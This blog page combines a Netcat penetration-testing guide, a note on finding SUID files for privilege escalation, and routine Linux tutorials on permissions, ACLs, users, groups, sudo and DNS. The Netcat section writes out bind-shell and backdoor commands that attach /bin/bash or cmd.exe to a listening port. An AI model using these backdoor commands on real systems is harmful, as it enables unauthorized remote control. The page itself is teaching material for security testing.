Blog – Weirdphish

Netcat Use Cases and Examples

Introduction: In the realm of cybersecurity, penetration testing plays a crucial role in identifying vulnerabilities and assessing the overall security posture of systems. Netcat, a versatile networking utility, has emerged as an essential tool for penetration testers. With its ability to establish raw network connections, Netcat enables professionals to conduct various tests and simulations, making it an indispensable asset for both Linux and Windows environments. In this comprehensive guide, we will delve into the features of Netcat and provide real-world command line examples to demonstrate its capabilities for penetration testing.

I. Understanding Netcat: Netcat, also known as “nc,” is a command-line tool used for reading and writing data across network connections. Its primary purpose is to establish raw network sockets, allowing for interaction with various protocols. Netcat is highly flexible and can be used for port scanning, banner grabbing, file transfers, remote administration, and much more. Let’s explore some of the essential features and use cases of Netcat on Linux and Windows systems.

II. Port Scanning and Banner Grabbing:

Port Scanning: Netcat can be employed to perform port scanning, which involves identifying open ports on a target system. By using the “-z” option, Netcat attempts to connect to specified ports, providing information about their status. Command Example (Linux):

nc -zv target_ip_address 1-1000

Command Example (Windows):

nc -zv target_ip_address 1-1000

Banner Grabbing: Banner grabbing allows penetration testers to gather information about a target system’s services and versions. Netcat can be used to connect to a specific port and retrieve banners. Command Example (Linux):

echo "" | nc target_ip_address port_number

Command Example (Windows):

echo "" | nc target_ip_address port_number

III. File Transfers: Netcat facilitates the transfer of files between systems, making it useful for penetration testers during information gathering or exploiting vulnerabilities.

Sending Files: Command Example (Linux):

nc -w3 target_ip_address port_number < file_to_send

Command Example (Windows):

nc -w3 target_ip_address port_number < file_to_send

Receiving Files: Command Example (Linux):

nc -w3 -l -p port_number > received_file

Command Example (Windows):

nc -w3 -l -p port_number > received_file

IV. Remote Administration: Netcat enables remote administration by providing a command shell that allows penetration testers to execute commands on a target system.

Listening for Connections (Linux):

nc -l -p port_number -vvv -e /bin/bash

Command Example (Windows):

nc -l -p port_number -vvv -e cmd.exe

Connecting to the Listener: Command Example (Linux):

nc target_ip_address port_number -vv

Command Example (Windows):

nc target_ip_address port_number -vv

V. Backdoor/Shells: Netcat can be utilized to create backdoors or reverse shells, providing access to a compromised

mkfifo /tmp/backpipe; nc -l -p port_number 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe

Command Example (Windows):

nc -l -p port_number -e cmd.exe

Connecting to the Backdoor: Command Example (Linux):

nc target_ip_address port_number

Command Example (Windows):

nc target_ip_address port_number

VI. Encrypted Communication: Netcat can be combined with other encryption tools, such as OpenSSL, to establish secure and encrypted communication channels. Command Example (Linux):

mkfifo /tmp/backpipe; nc -l -p port_number 0</tmp/backpipe | openssl enc -des3 -pass pass:password | /bin/bash 1>/tmp/backpipe

Command Example (Windows):

nc -l -p port_number -e cmd.exe

Conclusion: Netcat is a powerful networking utility that serves as an invaluable tool for penetration testing on Linux and Windows systems. Its wide range of features, including port scanning, banner grabbing, file transfers, remote administration, and backdoor creation, provide penetration testers with extensive capabilities for assessing system security. By mastering Netcat’s command line options and examples, professionals can enhance their penetration testing endeavors and effectively identify vulnerabilities in target systems. Always ensure proper authorization and adherence to ethical guidelines when conducting penetration tests.

What is a SUID?

As well as the standard read, write and execute permissions applied to files there are some special permissions. These include SUID, SGID, and sticky bit. SUID stands for Set owner User ID upon execution. Normally when a program runs, it inherits permissions from the logged-on user. When the SUID special permission is applied to a file, the file executes with the permissions of the user who owns the file.

This is shown in the screenshot below on the /usr/bin/mount file, where the user x permission is replaced with an s.

Ok so that’s nice, but why is it important. Well if the SUID bit is set on a service or executable that is owned by root then this can be used to escalate privileges on the affected system.

Finding files with a SUID can be achieved with the command below:

>find / -perm -u=s -type f 2>/dev/null

A site with good examples of how misconfigured SUID permissions can be used to escalate privileges can be found here https://pentestlab.blog/2017/09/25/suid-executables/

Sending and Receiving Files Using Netcat

Netcat, often shortened to nc is a utility for reading from and writing to network connections using TCP or UDP. Its often viewed as the swiss army knife of network utilities and can be driven directly or used in scripts.

To send a file using netcat, on the receiving server:

>nc -l -p 1234 -q 1 > something.txt < /dev/null

On the server sending the file

>cat something.txt | netcat server.ip.here 1234

A good netcat reference can be found here: https://www.varonis.com/blog/netcat-commands/

Managing File Permissions

In order to see what permissions have been set on a file the ls command can be used.

>ls -l

So what does all that mean? All of the lines start with a string like -rw-rw-r– or drwxrwxr-x. Lets brake this down. The first character can be either – or d, – denotes a file and d a directory.

The remaining characters are split into three groups of three characters. The first group denotes the permissions assigned to the user or the owner of the file. The next three are the permissions assigned to the group of the file and the last 3 are the permissions assigned to others.

The characters follow a simple scheme.

r = read
w = write
x = execute
– = no permission assigned

In the diagram above the user who created the file has read and write permissions but does not have execute permissions. The same permissions apply to the group. All other users only have read permissions.

Note the x -execute permission shown on the directory in the screenshot above means that the folder can be accessed by the user or group it is applied to.

Changing File Permissions

A useful command for managing file permissions is chmod which can be used in two ways, absolute mode or symbolic mode. Absolute mode uses numerals to define permissions whilst symbolic defines the permissions using letters.

Absolute Permissions

Absolute	Permission Type	Symbolic
0	No Permission	—
1	Execute	–x
2	Write	-w-
3	Execute + Write	-wx
4	Read	r–
5	Read + Execute	r-x
6	Read +Write	rw-
7	Read + Write +Execute	rwx

For example, using absolute mode to set the permissions of a file to user to read+write+execute, group to read+write, other to read, you would run the command:

>chmod 764 file1.txt

Symbolic Permissions

User Denotations
u	user/owner
g	group
o	other
a	all

Operator	Description
+	Adds a permission to a file or directory
–	Removes the permission
=	Sets the permission and overrides the permissions set earlier.

Achieving the same permissions via symbolic commands as we did above looks like this:

>sudo chmod u=rwx file1.txt

Changing File Ownership

If you want to change who has access to a file you use the chown command. For example to change the user and group with access to a file:

>sudo chown user:group file

As an example
>sudo chown fbloggs:testgrp file1.txt

Now, file1.txt is able to be accessed by the fbloggs account or members of the testgrp.

Setting ACLs for Additional Users and Groups

All this is a bit limiting though, one user and one group per file, does not allow for much flexibility. The good news is that there is a way around this using Access Control lists.

To see whether a an ACL is set run the ls command

>ls -l

If you see a + at the end of the access control list then an ACL has been applied as is shown on fu.txt in the image below.

To see the acl use the getacl command.

> getacl fu.txt

In this case both the file owner ffugazi and another user and group fbloggs have access to the file.

To set an ACL on a file run setfacl.

To add an additional user or modify an existing user:
>setfacl -m u:username:rwx ./fu.txt
To add an additional group or modify an existing user:
>setfacl -m g:group:rwx ./fu.txt

To remove all permissions for a user:
>setfacl -x u:username ./fu.txt
To remove all permissions for a group:
>setfacl -x g:group ./fu.txt

Setfacl and getfacl can both be used on directories too. In the case of directories, a d is prepended to the permissions.

The Sticky Bit

One other extended permission that is worth mentioning is the sticky bit. Say for example you have a shared directory that all users of a system can access and edit. What is to stop a user from accidentally deleting files that were created by another user? Enter the sticky bit. This is a flag on a file or directory which lets only the owner of the file or the root user delete the file. How do we set this?

>sudo chmod +t fudir
>sudo chmod +t fu.txt

To remove a sticky bit use the -t option.

>chmod -t fu.txt

Managing Groups in Linux

Groups play an important role in controlling the access to files and resources in Linux. However, group management is a little different in Linux from that of Windows. One difference is that when a user is created, a group with the same name as the user is also created. So if we set up a user ffugazi a group called ffugazi is also created and the user object is put in it. Another difference is the idea of nested groups does not exist in Linux, a single group will be applied to a single file.

Users can have primary and secondary groups. Primary groups are created when a user account is created and have the same name as the user; when a user carries out an action, by default it uses this group’s context for all actions. For example, when a user creates a file the group with the same name as their account (the primary group) is applied to the file. Primary groups are detailed in the /etc/passwd file.

Secondary groups are those a user may be added to once they already have an account, can be called anything, and can be used to grant access to shared resorces. They are detailed in /etc/group file.

This arrangement of primary and multiple secondary groups that a user can be a member of does mean that you have to remember that when you create a file unless you apply a shared group, no one else will have access by default, the chgrp command will need to be used to apply group to a file.

So how do we create a group in Linux?

>sudo groupadd testgroup

Removing a group is equally easy.

>sudo groupdel testgroup

If we want to modify a group there is the handy groupmod command. For example if we want to change the name of the group to testgrp:

>sudo groupmod -n testgrp testgroup

Adding or removing a user to or from a group is done using the gpasswd command. Adding users to groups can also be done using the adduser, useradd and usermod commands too.

Adding users to groups
>sudo gpasswd -a ffugazi testgrp
OR
>sudo adduser ffugazi testgrp
OR
>sudo useradd -G testgrp ffugazi
OR
>sudo usermod -a -G testgrp ffugazi

usermod is also useful for adding a user to multiple groups
>sudo usermod –a –G group1,group2,group3 ffugazi

Removing a user from a group
>sudo gpasswd -d ffugazi testgrp
OR
>sudo deluser ffugazi testgrp

Users can also be made an admin for the group.

>sudo gpasswd -A ffugazi testgrp

If we wanted to make a user an administrator on our Linux system we would use the command below to grant sudo access:

Ubuntu / Debian
>sudo usermod -a -G sudo ffugazi
On RHEL / Centos
>sudo usermod -a -G wheel ffugazi

If a user needs access to resources only accessible to their secondary group they would use:

>newgroup testgrp

Resources the group testgrp have permissions to access would now be available.

Verifying information about users and groups can be done with the getent and groups commands

Managing Users in Linux

Creating users in Linux is fairly straightforward and achieved as most things in Linux are, via the command line. To create a user account locally, make sure you sudo and run a command like the one below:

>sudo useradd ffugazi -c "Fred Fugazi" -e 2020/06/01 -s /bin/dash -d /home/gred_fugazi -m

OK, so what do all the command line options do?

-c Full Name
-e Expiry date
-s Detault Shell
-d Home directory
-m Create home dirtectory

To check the user has been created correctly you can check the /etc/passwd file and look for the home directory’s existence. The home drive will be created by copying the /etc/skel folder.

If you want to check the default settings being applied to an account this can be done by running this command:

>useradd -D

The file /etc/login.defs also contain settings used to set things like min and max password ages amongst others.

The login.defs file can also be modified to ensure that a user’s home directory is created each time by default by changing the create_home setting from no to yes.

CREATE_HOME     yes

Although the user account has been created the user will not be able to logon without a password being set. To do this run:

>sudo passwd username

You will be prompted to enter a password and confirm it.

Let’s check the account’s password expiration policy, we can do that with the chage command.

>sudo chage -l ffugazi

If we want to change the password expiration policy we can do so again with chage – see screenshot below.

-m Minimum password age in days
-M Maximum password age in days
-E Account expiry date
-W Warning days

Let’s say that we need to change something with our user account, for example, let’s say the user has changed their name. If we want to change the username to fjones we would run the below command.

> sudo usermod -l fjones ffugazi

Let’s say our new fjones account has done something suspicious and we want to lock the account, this can also be done with the usermod command.

> sudo usermod -L fjones

Looking at the /etc/shadow file allows us to check the account status. The highlighted ! after fjones: shows that the account is locked.

Let’s say we’ve now checked out what fjones was doing and it’s all OK so we want to unlock the account.

>sudo usermod -U fjones

This time the ! has gone showing that the account is active.

If we want to change the default shell that a user has access to, this can also be changed. This can also be set to no shell for non-interactive user accounts.

>sudo chsh -s /sbin/nologin fjones

Removing users is equally easy and done with the userdel command.

> sudo userdel -r fjones

How to mount an ISO file on Linux

The first step is to create a mount point for the iso file to be loaded in.

>sudo mkdir /mnt/iso

Next use the mount command to attach the iso file you want to load.

>sudo mount /pathtoiso/image.iso /mnt/iso -o loop

The -o loop command tells the command to mount a loop device to the iso specified, then mount it on the mounts point specified.

To view, the contents of the iso file use the ls command.

> ls /mnt/iso

When you are done and want to unmount the iso, run the following command.

>sudo umount /mnt/iso

If the iso is in use this command will force it to unmount.

How to flush DNS resolver cache

Note – this works on Ubuntu 18.04, 20.04 and Centos 8

Check that systemd-resolved is running by entering the command below.

> sudo systemctl status systemd-resolved

If the service is running you should see output like that above.

To check the number of items in the cache run:

>sudo systemd-resolve statistics

This will show the size of the cache and current hits.

To clear the local DNS cache run the command below

> sudo systemd-resolve --flush-caches

If you run the command systemd-resolve –statistics again you will now see the cache is empty.

Linux: Setting up Users and Groups – Super Users

Super User Privileges

We need super user privileges for a variety of tasks on Linux, for example system-wide changes, changes that affect other users, and changing the configuration of services.

There are a few ways to get access to superuser privileges, the most commonly used when entering a single command is sudo.

>sudo apt install chromium

This will prompt you for a password, execute the command as root and then cache the password for a default time of 5 minutes.

If we want to make a change as though we were another user or even the root user we would use the su command. Su stands for substitute user.

> su -
this switches to the root user
> su - fred
this switches to the user fred

Not just any user is authorised to run su/sudo, your account must be authorised. Some distros, for example, Ubuntu have a sudo group as a secondary group on other distros you need to make your own group and add it to the /etc/sudoers file.

>visudo fred ALL=(ALL)

If you wanted to limit a user to having sudo rights over specific commands then the sudoers file would contain an entry like this.

%fred localhost=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom

This would just allow fred access to mount and unmount cdroms.

There is also the command sudoedit which is useful for editing single protected files.

>sudoedit /etc/hosts.allow

All good things come to those who wait……

Welcome to Weirdphish, right now we are getting things ready and before you know it we will be up and running. Check back in to see how we are doing.